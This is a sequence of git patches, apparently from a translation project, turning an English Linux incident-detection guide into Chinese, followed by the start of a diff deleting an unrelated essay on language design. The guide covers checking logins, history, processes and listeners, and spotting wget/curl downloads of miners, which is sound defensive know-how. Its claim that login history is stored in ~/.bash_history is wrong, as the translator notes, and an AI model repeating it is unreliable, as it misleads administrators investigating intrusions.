+如何判断Linux服务器是否被入侵 -------------- -A server being compromised or hacked for the purpose of this guide is an unauthorized person or bot logging into the server in order to use it for their own, usually negative ends. +本指南中所谓的服务器被入侵或者说被黑了的意思是指未经认证的人或程序为了自己的目的登录到服务器上去并使用其计算资源, 通常会产生不好的影响. -Disclaimer: If your server has been compromised by a state organization like the NSA or a serious criminal group then you will not notice any problems and the following techniques will not register their presence. +免责声明: 若你的服务器被类似NSA这样的国家机关或者某个犯罪集团如请,那么你并不会发现有任何问题,这些技术也无法发觉他们的存在. -However, the majority of compromised servers are carried out by bots i.e. automated attack programs, in-experienced attackers e.g. “script kiddies”, or dumb criminals. +然而, 大多数被攻破的服务器都是被类似自动攻击程序这样的程序或者类似“脚本小子”这样的廉价攻击者,以及蠢蛋犯罪所入侵的. -These sorts of attackers will abuse the server for all it’s worth whilst they have access to it and take few precautions to hide what they are doing. +这类攻击者会在访问服务器的同时滥用服务器资源,并且不怎么会采取措施来隐藏他们正在做的事情. -### Symptoms of a compromised server +### 入侵服务器的症状 -When a server has been compromised by an in-experienced or automated attacker they will usually do something with it that consumes 100% of a resource. This resource will usually be either the CPU for something like crypt-currency mining or email spamming, or bandwidth for launching a DOS attack. +当服务器被没有经验攻击者或者自动攻击程序入侵了的话,他们往往会消耗100%的资源. 他们可能消耗CPU资源来进行数字货币的采矿或者发送垃圾邮件,也可能消耗带宽来发动 `DoS` 攻击. -This means that the first indication that something is amiss is that the server is “going slow”. This could manifest in the website serving pages much slower than usual, or email taking many minutes to deliver or send. +因此出现问题的第一个表现就是服务器 “变慢了”. 这可能表现在网站的页面打开的很慢, 或者电子邮件要花很长时间才能发送出去. -So what should you look for? +那么你应该查看那些东西呢? -### Check 1 - Who’s currently logged in? +#### 检查 1 - 当前都有谁在登录? -The first thing you should look for is who is currently logged into the server. It is not uncommon to find the attacker actually logged into the server and working on it. +你首先要查看当前都有谁登录在服务器上. 发现攻击者登录到服务器上进行操作并不罕见. -The shell command to do this is w. Running w gives the following output: +其对应的命令是 `w`. 运行 `w` 会输出如下结果: ``` 08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 @@ -32,19 +31,19 @@ root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w ``` -One of those IP’s is a UK IP and the second is Vietnamese. That’s probably not a good thing. +第一个IP是英国IP,而第二个IP是越南IP. 这个不是个好兆头. -Stop and take a breath, don’t panic and simply kill their SSH connection. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in. +停下来做个深呼吸, 不要紧,只需要杀掉他们的SSH连接就好了. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in. -Please see the What should I do if I’ve been compromised section at the end of this guide no how to proceed if you do find evidence of compromise. +请参阅本文最后的 `入侵之后怎么办` 这一章节来看发现被入侵的证据后应该怎么办. -The whois command can be run on IP addresses and will tell you what all the information about the organization that the IP is registered to, including the country. +`whois` 命令可以接一个IP地址然后告诉你IP注册的组织的所有信息, 当然就包括所在国家的信息. -### Check 2 - Who has logged in? +#### 检查 2 - 谁曾经登录过? -Linux servers keep a record of which users logged in, from what IP, when and for how long. This information is accessed with the last command. +Linux 服务器会记录下哪些用户,从哪个IP,在什么时候登录的以及登陆了多长时间这些信息. 使用 `last` 命令可以查看这些信息. -The output looks like this: +输出类似这样: ``` root pts/1 78.31.109.1 Thu Nov 30 08:26 still logged in @@ -55,53 +54,56 @@ root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21) ``` -There is a mix of my UK IP’s and some Vietnamese ones, with the top two still logged in. If you see any IP’s that are not authorized then refer to the final section. +这里可以看到英国IP和越南IP交替出现, 而且最上面两个IP现在还处于登录状态. 如果你看到任何未经授权的IP,那么请参阅最后章节. -The login history is contained in a text file at ~/.bash_history and is therefore easily removable. Often, attackers will simply delete this file to try to cover their tracks. Consequently, if you run last and only see your current login, this is a Bad Sign. +登录历史记录会以文本格式记录到 `~/.bash_history`(注:这里作者应该写错了)中,因此很容易被删除. +通常攻击者会直接把这个文件删掉,以掩盖他们的攻击行为. 因此, 若你运行了 `last` 命令却只看得见你的当前登录,那么这就是个不妙的信号. -If there is no login history be very, very suspicious and continue looking for indications of compromise. +如果没有登录历史的话,请一定小心,继续留意入侵的其他线索. -### Check 3 - Review the command history +#### 检查 3 - 回顾命令历史 -This level of attacker will frequently take no precautions to leave no command history so running the history command will show you everything they have done. Be on the lookout for wget or curl commands to download out-of-repo software such as spam bots or crypto miners. +这个层次的攻击者通常不会注意掩盖命令的历史记录,因此运行 `history` 命令会显示出他们曾经做过的所有事情. +一定留意有没有用 `wget` 或 `curl` 命令来下载类似垃圾邮件机器人或者挖矿程序之类的软件. -The command history is contained in the ~/.bash_history file so some attackers will delete this file to cover what they have done. Just as with the login history, if you run history and don’t see anything then the history file has been deleted. Again this is a Bad Sign and you should review the server very carefully. +命令历史存储在 `~/.bash_history` 文件中,因此有些攻击者会删除该文件以掩盖他们的所作所为. +跟登录历史一样, 若你运行 `history` 命令却没有输出任何东西那就表示历史文件被删掉了. 这也是个不妙的信号,你需要很小心地检查一下服务器了. -### Check 4 - What’s using all the CPU? +#### 检查 4 - 哪些进程在消耗CPU? -The sorts of attackers that you will encounter usually don’t take too many precautions to hide what they are doing. So they will run processes that consume all the CPU. This generally makes it pretty easy to spot them. Simply run top and look at the highest process. +你常遇到的这类攻击者通常不怎么会去掩盖他们做的事情. 他们会运行一些特别消耗CPU的进程. 这就很容易发着这些进程了. 只需要运行 `top` 然后看最前的那几个进程就行了. -This will also show people exploiting your server without having logged in. This could be, for example, someone using an unprotected form-mail script to relay spam. +这也能显示出那些未登录的攻击者来. 比如,可能有人在用未受保护的邮件脚本来发送垃圾邮件. -If you don’t recognize the top process then either Google its name or investigate what it’s doing with losf or strace. +如果你最上面的进程对不了解,那么你可以google一下进程名称,或者通过 `losf` 和 `strace` 来看看它做的事情是什么. -To use these tools first copy its PID from top and run: +使用这些工具,第一步从 `top` 中拷贝出进程的 PID,然后运行: -``` +```shell strace -p PID ``` -This will display all the system calls the process is making. It’s a lot of information but looking through it will give you a good idea what’s going on. +这会显示出进程调用的所有系统调用. 它产生的内容会很多,但这些信息能告诉你这个进程在做什么. ``` lsof -p PID ``` -This program will list the open files that the process has. Again, this will give you a good idea what it’s doing by showing you what files it is accessing. +这个程序会列出进程打开的文件. 通过查看它访问的文件可以很好的理解它在做的事情. -### Check 5 - Review the all the system processes +#### Check 5 - Review the all the system processes If an unauthorized process is not consuming enough CPU to get listed noticeably on top it will still get displayed in a full process listing with ps. My proffered command is ps auxf for providing the most information clearly. -You should be looking for any processes that you don’t recognize. The more times you run ps on your servers (which is a good habit to get into) the more obvious an alien process will stand out. +You should be looking for any processes that you don’t recognize. The more times you run ps on your servers (which is a good habikkt to get into) the more obvious an alien process will stand out. -### Check 6 - Review network usage by process +#### Check 6 - Review network usage by process The command iftop functions like top to show a ranked list of processes that are sending and receiving network data along with their source and destination. A process like a DOS attack or spam bot will immediately show itself at the top of the list. -### Check 7 - What processes are listening for network connections? +#### Check 7 - What processes are listening for network connections? Often an attacker will install a program that doesn’t do anything except listen on the network port for instructions. This does not consume CPU or bandwidth whilst it is waiting so can get overlooked in the top type commands. From fbe498d3aa1b03e3881fcb3be891245fc2626866 Mon Sep 17 00:00:00 2001 From: darksun Date: Mon, 4 Dec 2017 23:31:15 +0800 Subject: [PATCH 0286/1627] take a break --- ... Tell If Your Linux Server Has Been Compromised.md | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md index a7af1098c7..cfd60d4753 100644 --- a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md +++ b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md @@ -93,15 +93,16 @@ lsof -p PID 这个程序会列出进程打开的文件. 通过查看它访问的文件可以很好的理解它在做的事情. -#### Check 5 - Review the all the system processes +#### 检查 5 - 检查所有的系统进程 -If an unauthorized process is not consuming enough CPU to get listed noticeably on top it will still get displayed in a full process listing with ps. My proffered command is ps auxf for providing the most information clearly. +消耗CPU不严重的未认证进程可能不会在 `top` 中显露出来,不过它依然可以通过 `ps` 列出来. 命令 `ps auxf` 就能显示足够清晰的信息了。 -You should be looking for any processes that you don’t recognize. The more times you run ps on your servers (which is a good habikkt to get into) the more obvious an alien process will stand out. +你需要检查一下每个不认识的进程. 经常运行 `ps` (这是个好习惯) 能帮助你发现奇怪的进程. -#### Check 6 - Review network usage by process +#### 检查 6 - 检查进程的网络使用情况 -The command iftop functions like top to show a ranked list of processes that are sending and receiving network data along with their source and destination. A process like a DOS attack or spam bot will immediately show itself at the top of the list. +`iftop` 的功能类似 `top`,他会显示一系列收发网络数据的进程以及他们的源地址和目的地址. +类似 `DoS` 攻击或垃圾制造器这样的进程很容易显示在列表的最顶端. #### Check 7 - What processes are listening for network connections? From 7d33d921317637b7d070b78d290e82d81270f29d Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 09:52:38 +0800 Subject: [PATCH 0287/1627] translated --- ... Your Linux Server Has Been Compromised.md | 36 ++++++++++--------- 1 file changed, 20 insertions(+), 16 deletions(-) diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md index cfd60d4753..f027d46292 100644 --- a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md +++ b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md @@ -104,11 +104,11 @@ lsof -p PID `iftop` 的功能类似 `top`,他会显示一系列收发网络数据的进程以及他们的源地址和目的地址. 类似 `DoS` 攻击或垃圾制造器这样的进程很容易显示在列表的最顶端. -#### Check 7 - What processes are listening for network connections? +#### 检查 7 - 哪些进程在监听网络连接? -Often an attacker will install a program that doesn’t do anything except listen on the network port for instructions. This does not consume CPU or bandwidth whilst it is waiting so can get overlooked in the top type commands. +通常攻击者会安装一个后门程序专门监听网络端口接受指令. 该进程等待期间是不会消耗CPU和带宽的,因此也就不容易通过 `top` 之类的命令发现. -The commands lsof and netstat will both list all networked processes. I use them with the following options: +`lsof` 和 `netstat` 命令都会列出所有的联网进程. 我通常会让他们带上下面这些参数: ``` lsof -i @@ -120,31 +120,35 @@ netstat -plunt ``` -You should look for any process that is listed as in the LISTEN or ESTABLISHED status as these processes are either waiting for a connection (LISTEN) or have a connection open (ESTABLISHED). If you don’t recognize these processes use strace or lsof to try to see what they are doing. +你需要留意那些处于 `LISTEN` 和 `ESTABLISHED` 状态的进程,这些进程要么正在等待连接(LISTEN),要么已经连接(ESTABLISHED). +如果遇到不认识的进程,使用 `strace` 和 `lsof` 来看看它们在做什么东西. -### What should I do if I’ve been compromised? +### 被入侵之后该怎么办呢? -The first thing to do is not to panic, especially if the attacker is currently logged in. You need to be able to take back control of the machine before the attacker is aware that you know about them. If they realize you know about them they may well lock you out of your server and start destroying any assets out of spite. +首先,不要紧张, 尤其当攻击者正处于登陆状态时更不能紧张. 你需要在攻击者警觉到你已经发现他之前夺回机器的控制权. +如果他发现你已经发觉到他了,那么他可能会锁死你不让你登陆服务器,然后开始毁尸灭迹. -If you are not very technical then simply shut down the server. Either from the server itself with shutdown -h now or systemctl poweroff. Or log into your hosting provider’s control panel and shut down the server. Once it’s powered off you can work on the needed firewall rules and consult with your provider in your own time. +如果你技术不太好那么就直接关机吧. 你可以在服务器上运行 `shutdown -h now` 或者 `systemctl poweroff` 这两条命令. 也可以登陆主机提供商的控制面板中关闭服务器. +关机后,你就可以开始配置防火墙或者咨询一下供应商的意见. -If you’re feeling a bit more confident and your hosting provider has an upstream firewall then create and enable the following two rules in this order: +如果你对自己颇有自信,而你的主机提供商也有提供上游防火墙,那么你只需要以此创建并启用下面两条规则就行了: -1. Allow SSH traffic from only your IP address. +1. 只允许从你的IP地址登陆SSH -2. Block everything else, not just SSH but every protocol on every port. +2. 封禁除此之外的任何东西,不仅仅是SSH,还包括任何端口上的任何协议. -This will immediately kill their SSH session and give only you access to the server. +这样会立即关闭攻击者的SSH会话,而只留下你访问服务器. -If you don’t have access to an upstream firewall then you will have to create and enable these firewall rules on the server itself and then, when they are in place kill the attacker’s ssh session with the kill command. +如果你无法访问上游防火墙,那么你就需要在服务器本身创建并启用这些防火墙策略,然后在防火墙规则起效后使用 `kill` 命令关闭攻击者的ssh会话. -A final method, where available, is to log into the server via an out-of-band connection such as the serial console and stop networking with systemctl stop network.service. This will completely stop any network access so you can now enable the firewall rules in your own time. +最后还有一种方法, 就是通过诸如串行控制台之类的带外连接登陆服务器,然后通过 `systemctl stop network.service` 停止网络功能. +这会关闭所有服务器上的网络连接,这样你就可以慢慢的配置那些防火墙规则了. -Once you have regained control of the server do not trust it. +重夺服务器的控制权后,也不要以为就万事大吉了. -Do not attempt to fix things up and continue using the server. You can never be sure what the attacker did and so you can never sure the server is secure. +不要试着修复这台服务器,让后接着用. 你永远不知道攻击者做过什么因此你也永远无法保证这台服务器还是安全的. -The only sensible course of action is to copy off all the data that you need and start again from a fresh install. +最好的方法就是拷贝出所有的资料,然后重装系统. -------------------------------------------------------------------------------- From fd99a177e1d55af9866961dfa44ab76cf2dca666 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 09:53:22 +0800 Subject: [PATCH 0288/1627] change to translated --- ...71128 How To Tell If Your Linux Server Has Been Compromised.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md (100%) diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md similarity index 100% rename from sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md rename to translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md From 76d717030288c4d77dec6fa2dcd9ede81a7b0f85 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 11:06:08 +0800 Subject: [PATCH 0289/1627] reformat --- ... Your Linux Server Has Been Compromised.md | 86 +++++++++---------- 1 file changed, 43 insertions(+), 43 deletions(-) diff --git a/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md index f027d46292..29fe95d868 100644 --- a/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md +++ b/translated/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md @@ -1,25 +1,25 @@ 如何判断Linux服务器是否被入侵 -------------- -本指南中所谓的服务器被入侵或者说被黑了的意思是指未经认证的人或程序为了自己的目的登录到服务器上去并使用其计算资源, 通常会产生不好的影响. +本指南中所谓的服务器被入侵或者说被黑了的意思是指未经认证的人或程序为了自己的目的登录到服务器上去并使用其计算资源, 通常会产生不好的影响。 -免责声明: 若你的服务器被类似NSA这样的国家机关或者某个犯罪集团如请,那么你并不会发现有任何问题,这些技术也无法发觉他们的存在. +免责声明: 若你的服务器被类似NSA这样的国家机关或者某个犯罪集团如请,那么你并不会发现有任何问题,这些技术也无法发觉他们的存在。 -然而, 大多数被攻破的服务器都是被类似自动攻击程序这样的程序或者类似“脚本小子”这样的廉价攻击者,以及蠢蛋犯罪所入侵的. +然而, 大多数被攻破的服务器都是被类似自动攻击程序这样的程序或者类似“脚本小子”这样的廉价攻击者,以及蠢蛋犯罪所入侵的。 -这类攻击者会在访问服务器的同时滥用服务器资源,并且不怎么会采取措施来隐藏他们正在做的事情. +这类攻击者会在访问服务器的同时滥用服务器资源,并且不怎么会采取措施来隐藏他们正在做的事情。 ### 入侵服务器的症状 -当服务器被没有经验攻击者或者自动攻击程序入侵了的话,他们往往会消耗100%的资源. 他们可能消耗CPU资源来进行数字货币的采矿或者发送垃圾邮件,也可能消耗带宽来发动 `DoS` 攻击. +当服务器被没有经验攻击者或者自动攻击程序入侵了的话,他们往往会消耗100%的资源. 他们可能消耗CPU资源来进行数字货币的采矿或者发送垃圾邮件,也可能消耗带宽来发动 `DoS` 攻击。 -因此出现问题的第一个表现就是服务器 “变慢了”. 这可能表现在网站的页面打开的很慢, 或者电子邮件要花很长时间才能发送出去. +因此出现问题的第一个表现就是服务器 “变慢了”. 这可能表现在网站的页面打开的很慢, 或者电子邮件要花很长时间才能发送出去。 那么你应该查看那些东西呢? #### 检查 1 - 当前都有谁在登录? -你首先要查看当前都有谁登录在服务器上. 发现攻击者登录到服务器上进行操作并不罕见. +你首先要查看当前都有谁登录在服务器上. 发现攻击者登录到服务器上进行操作并不罕见。 其对应的命令是 `w`. 运行 `w` 会输出如下结果: @@ -31,17 +31,17 @@ root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w ``` -第一个IP是英国IP,而第二个IP是越南IP. 这个不是个好兆头. +第一个IP是英国IP,而第二个IP是越南IP. 这个不是个好兆头。 -停下来做个深呼吸, 不要紧,只需要杀掉他们的SSH连接就好了. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in. +停下来做个深呼吸, 不要紧,只需要杀掉他们的SSH连接就好了. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in。 -请参阅本文最后的 `入侵之后怎么办` 这一章节来看发现被入侵的证据后应该怎么办. +请参阅本文最后的 `入侵之后怎么办` 这一章节来看发现被入侵的证据后应该怎么办。 -`whois` 命令可以接一个IP地址然后告诉你IP注册的组织的所有信息, 当然就包括所在国家的信息. +`whois` 命令可以接一个IP地址然后告诉你IP注册的组织的所有信息, 当然就包括所在国家的信息。 #### 检查 2 - 谁曾经登录过? -Linux 服务器会记录下哪些用户,从哪个IP,在什么时候登录的以及登陆了多长时间这些信息. 使用 `last` 命令可以查看这些信息. +Linux 服务器会记录下哪些用户,从哪个IP,在什么时候登录的以及登陆了多长时间这些信息. 使用 `last` 命令可以查看这些信息。 输出类似这样: @@ -54,28 +54,28 @@ root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21) ``` -这里可以看到英国IP和越南IP交替出现, 而且最上面两个IP现在还处于登录状态. 如果你看到任何未经授权的IP,那么请参阅最后章节. +这里可以看到英国IP和越南IP交替出现, 而且最上面两个IP现在还处于登录状态. 如果你看到任何未经授权的IP,那么请参阅最后章节。 -登录历史记录会以文本格式记录到 `~/.bash_history`(注:这里作者应该写错了)中,因此很容易被删除. -通常攻击者会直接把这个文件删掉,以掩盖他们的攻击行为. 因此, 若你运行了 `last` 命令却只看得见你的当前登录,那么这就是个不妙的信号. +登录历史记录会以文本格式记录到 `~/.bash_history`(注:这里作者应该写错了)中,因此很容易被删除。 +通常攻击者会直接把这个文件删掉,以掩盖他们的攻击行为. 因此, 若你运行了 `last` 命令却只看得见你的当前登录,那么这就是个不妙的信号。 -如果没有登录历史的话,请一定小心,继续留意入侵的其他线索. +如果没有登录历史的话,请一定小心,继续留意入侵的其他线索。 #### 检查 3 - 回顾命令历史 -这个层次的攻击者通常不会注意掩盖命令的历史记录,因此运行 `history` 命令会显示出他们曾经做过的所有事情. -一定留意有没有用 `wget` 或 `curl` 命令来下载类似垃圾邮件机器人或者挖矿程序之类的软件. +这个层次的攻击者通常不会注意掩盖命令的历史记录,因此运行 `history` 命令会显示出他们曾经做过的所有事情。 +一定留意有没有用 `wget` 或 `curl` 命令来下载类似垃圾邮件机器人或者挖矿程序之类的软件。 -命令历史存储在 `~/.bash_history` 文件中,因此有些攻击者会删除该文件以掩盖他们的所作所为. -跟登录历史一样, 若你运行 `history` 命令却没有输出任何东西那就表示历史文件被删掉了. 这也是个不妙的信号,你需要很小心地检查一下服务器了. +命令历史存储在 `~/.bash_history` 文件中,因此有些攻击者会删除该文件以掩盖他们的所作所为。 +跟登录历史一样, 若你运行 `history` 命令却没有输出任何东西那就表示历史文件被删掉了. 这也是个不妙的信号,你需要很小心地检查一下服务器了。 #### 检查 4 - 哪些进程在消耗CPU? -你常遇到的这类攻击者通常不怎么会去掩盖他们做的事情. 他们会运行一些特别消耗CPU的进程. 这就很容易发着这些进程了. 只需要运行 `top` 然后看最前的那几个进程就行了. +你常遇到的这类攻击者通常不怎么会去掩盖他们做的事情. 他们会运行一些特别消耗CPU的进程. 这就很容易发着这些进程了. 只需要运行 `top` 然后看最前的那几个进程就行了。 -这也能显示出那些未登录的攻击者来. 比如,可能有人在用未受保护的邮件脚本来发送垃圾邮件. +这也能显示出那些未登录的攻击者来. 比如,可能有人在用未受保护的邮件脚本来发送垃圾邮件。 -如果你最上面的进程对不了解,那么你可以google一下进程名称,或者通过 `losf` 和 `strace` 来看看它做的事情是什么. +如果你最上面的进程对不了解,那么你可以google一下进程名称,或者通过 `losf` 和 `strace` 来看看它做的事情是什么。 使用这些工具,第一步从 `top` 中拷贝出进程的 PID,然后运行: @@ -84,29 +84,29 @@ strace -p PID ``` -这会显示出进程调用的所有系统调用. 它产生的内容会很多,但这些信息能告诉你这个进程在做什么. +这会显示出进程调用的所有系统调用. 它产生的内容会很多,但这些信息能告诉你这个进程在做什么。 ``` lsof -p PID ``` -这个程序会列出进程打开的文件. 通过查看它访问的文件可以很好的理解它在做的事情. +这个程序会列出进程打开的文件. 通过查看它访问的文件可以很好的理解它在做的事情。 #### 检查 5 - 检查所有的系统进程 消耗CPU不严重的未认证进程可能不会在 `top` 中显露出来,不过它依然可以通过 `ps` 列出来. 命令 `ps auxf` 就能显示足够清晰的信息了。 -你需要检查一下每个不认识的进程. 经常运行 `ps` (这是个好习惯) 能帮助你发现奇怪的进程. +你需要检查一下每个不认识的进程. 经常运行 `ps` (这是个好习惯) 能帮助你发现奇怪的进程。 #### 检查 6 - 检查进程的网络使用情况 -`iftop` 的功能类似 `top`,他会显示一系列收发网络数据的进程以及他们的源地址和目的地址. -类似 `DoS` 攻击或垃圾制造器这样的进程很容易显示在列表的最顶端. +`iftop` 的功能类似 `top`,他会显示一系列收发网络数据的进程以及他们的源地址和目的地址。 +类似 `DoS` 攻击或垃圾制造器这样的进程很容易显示在列表的最顶端。 #### 检查 7 - 哪些进程在监听网络连接? -通常攻击者会安装一个后门程序专门监听网络端口接受指令. 该进程等待期间是不会消耗CPU和带宽的,因此也就不容易通过 `top` 之类的命令发现. +通常攻击者会安装一个后门程序专门监听网络端口接受指令. 该进程等待期间是不会消耗CPU和带宽的,因此也就不容易通过 `top` 之类的命令发现。 `lsof` 和 `netstat` 命令都会列出所有的联网进程. 我通常会让他们带上下面这些参数: @@ -120,35 +120,35 @@ netstat -plunt ``` -你需要留意那些处于 `LISTEN` 和 `ESTABLISHED` 状态的进程,这些进程要么正在等待连接(LISTEN),要么已经连接(ESTABLISHED). -如果遇到不认识的进程,使用 `strace` 和 `lsof` 来看看它们在做什么东西. +你需要留意那些处于 `LISTEN` 和 `ESTABLISHED` 状态的进程,这些进程要么正在等待连接(LISTEN),要么已经连接(ESTABLISHED)。 +如果遇到不认识的进程,使用 `strace` 和 `lsof` 来看看它们在做什么东西。 ### 被入侵之后该怎么办呢? -首先,不要紧张, 尤其当攻击者正处于登陆状态时更不能紧张. 你需要在攻击者警觉到你已经发现他之前夺回机器的控制权. -如果他发现你已经发觉到他了,那么他可能会锁死你不让你登陆服务器,然后开始毁尸灭迹. +首先,不要紧张, 尤其当攻击者正处于登陆状态时更不能紧张. 你需要在攻击者警觉到你已经发现他之前夺回机器的控制权。 +如果他发现你已经发觉到他了,那么他可能会锁死你不让你登陆服务器,然后开始毁尸灭迹。 -如果你技术不太好那么就直接关机吧. 你可以在服务器上运行 `shutdown -h now` 或者 `systemctl poweroff` 这两条命令. 也可以登陆主机提供商的控制面板中关闭服务器. -关机后,你就可以开始配置防火墙或者咨询一下供应商的意见. +如果你技术不太好那么就直接关机吧. 你可以在服务器上运行 `shutdown -h now` 或者 `systemctl poweroff` 这两条命令. 也可以登陆主机提供商的控制面板中关闭服务器。 +关机后,你就可以开始配置防火墙或者咨询一下供应商的意见。 如果你对自己颇有自信,而你的主机提供商也有提供上游防火墙,那么你只需要以此创建并启用下面两条规则就行了: 1. 只允许从你的IP地址登陆SSH -2. 封禁除此之外的任何东西,不仅仅是SSH,还包括任何端口上的任何协议. +2. 封禁除此之外的任何东西,不仅仅是SSH,还包括任何端口上的任何协议。 -这样会立即关闭攻击者的SSH会话,而只留下你访问服务器. +这样会立即关闭攻击者的SSH会话,而只留下你访问服务器。 -如果你无法访问上游防火墙,那么你就需要在服务器本身创建并启用这些防火墙策略,然后在防火墙规则起效后使用 `kill` 命令关闭攻击者的ssh会话. +如果你无法访问上游防火墙,那么你就需要在服务器本身创建并启用这些防火墙策略,然后在防火墙规则起效后使用 `kill` 命令关闭攻击者的ssh会话。 -最后还有一种方法, 就是通过诸如串行控制台之类的带外连接登陆服务器,然后通过 `systemctl stop network.service` 停止网络功能. -这会关闭所有服务器上的网络连接,这样你就可以慢慢的配置那些防火墙规则了. +最后还有一种方法, 就是通过诸如串行控制台之类的带外连接登陆服务器,然后通过 `systemctl stop network.service` 停止网络功能。 +这会关闭所有服务器上的网络连接,这样你就可以慢慢的配置那些防火墙规则了。 -重夺服务器的控制权后,也不要以为就万事大吉了. +重夺服务器的控制权后,也不要以为就万事大吉了。 -不要试着修复这台服务器,让后接着用. 你永远不知道攻击者做过什么因此你也永远无法保证这台服务器还是安全的. +不要试着修复这台服务器,让后接着用. 你永远不知道攻击者做过什么因此你也永远无法保证这台服务器还是安全的。 -最好的方法就是拷贝出所有的资料,然后重装系统. +最好的方法就是拷贝出所有的资料,然后重装系统。 -------------------------------------------------------------------------------- From 3b22bdfdf8077159865a73b683f15f68e6daac9f Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 15:55:46 +0800 Subject: [PATCH 0290/1627] Delete 20171118 Language engineering for great justice.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 删除源文件 --- ... Language engineering for great justice.md | 60 ------------------- 1 file changed, 60 deletions(-) delete mode 100644 sources/tech/20171118 Language engineering for great justice.md diff --git a/sources/tech/20171118 Language engineering for great justice.md b/sources/tech/20171118 Language engineering for great justice.md deleted file mode 100644 index 35d9bd854f..0000000000 --- a/sources/tech/20171118 Language engineering for great justice.md +++ /dev/null @@ -1,60 +0,0 @@ -Translating by ValoniaKim -Language engineering for great justice -============================================================ - -Whole-systems engineering, when you get good at it, goes beyond being entirely or even mostly about technical optimizations. Every artifact we make is situated in a context of human action that widens out to the economics of its use, the sociology of its users, and the entirety of what Austrian economists call “praxeology”, the science of purposeful human behavior in its widest scope. - -This isn’t just abstract theory for me. When I wrote my papers on open-source development, they were exactly praxeology – they weren’t about any specific software technology or objective but about the context of human action within which technology is worked. An increase in praxeological understanding of technology can reframe it, leading to tremendous increases in human productivity and satisfaction, not so much because of changes in our tools but because of changes in the way we grasp them. - -In this, the third of my unplanned series of posts about the twilight of C and the huge changes coming as we actually begin to see forward into a new era of systems programming, I’m going to try to cash that general insight out into some more specific and generative ideas about the design of computer languages, why they succeed, and why they fail. - -In my last post I noted that every computer language is an embodiment of a relative-value claim, an assertion about the optimal tradeoff between spending machine resources and spending programmer time, all of this in a context where the cost of computing power steadily falls over time while programmer-time costs remain relatively stable or may even rise. I also highlighted the additional role of transition costs in pinning old tradeoff assertions into place. I described what language designers do as seeking a new optimum for present and near-future conditions. - -Now I’m going to focus on that last concept. A language designer has lots of possible moves in language-design space from where the state of the art is now. What kind of type system? GC or manual allocation? What mix of imperative, functional, or OO approaches? But in praxeological terms his choice is, I think, usually much simpler: attack a near problem or a far problem? - -“Near” and “far” are measured along the curves of falling hardware costs, rising software complexity, and increasing transition costs from existing languages. A near problem is one the designer can see right in front of him; a far problem is a set of conditions that can be seen coming but won’t necessarily arrive for some time. A near solution can be deployed immediately, to great practical effect, but may age badly as conditions change. A far solution is a bold bet that may smother under the weight of its own overhead before its future arrives, or never be adopted at all because moving to it is too expensive. - -Back at the dawn of computing, FORTRAN was a near-problem design, LISP a far-problem one. Assemblers are near solutions. Illustrating that the categories apply to non-general-purpose languages, also roff markup. Later in the game, PHP and Javascript. Far solutions? Oberon. Ocaml. ML. XML-Docbook. Academic languages tend to be far because the incentive structure around them rewards originality and intellectual boldness (note that this is a praxeological cause, not a technical one!). The failure mode of academic languages is predictable; high inward transition costs, nobody goes there, failure to achieve community critical mass sufficient for mainstream adoption, isolation, and stagnation. (That’s a potted history of LISP in one sentence, and I say that as an old LISP-head with a deep love for the language…) - -The failure modes of near designs are uglier. The best outcome to hope for is a graceful death and transition to a newer design. If they hang on (most likely to happen when transition costs out are high) features often get piled on them to keep them relevant, increasing complexity until they become teetering piles of cruft. Yes, C++, I’m looking at you. You too, Javascript. And (alas) Perl, though Larry Wall’s good taste mitigated the problem for many years – but that same good taste eventually moved him to blow up the whole thing for Perl 6. - -This way of thinking about language design encourages reframing the designer’s task in terms of two objectives. (1) Picking a sweet spot on the near-far axis away from you into the projected future; and (2) Minimizing inward transition costs from one or more existing languages so you co-opt their userbases. And now let’s talk about about how C took over the world. - -There is no more more breathtaking example than C than of nailing the near-far sweet spot in the entire history of computing. All I need to do to prove this is point at its extreme longevity as a practical, mainstream language that successfully saw off many competitors for its roles over much of its range. That timespan has now passed about 35 years (counting from when it swamped its early competitors) and is not yet with certainty ended. - -OK, you can attribute some of C’s persistence to inertia if you want, but what are you really adding to the explanation if you use the word “inertia”? What it means is exactly that nobody made an offer that actually covered the transition costs out of the language! - -Conversely, an underappreciated strength of the language was the low inward transition costs. C is an almost uniquely protean tool that, even at the beginning of its long reign, could readily accommodate programming habits acquired from languages as diverse as 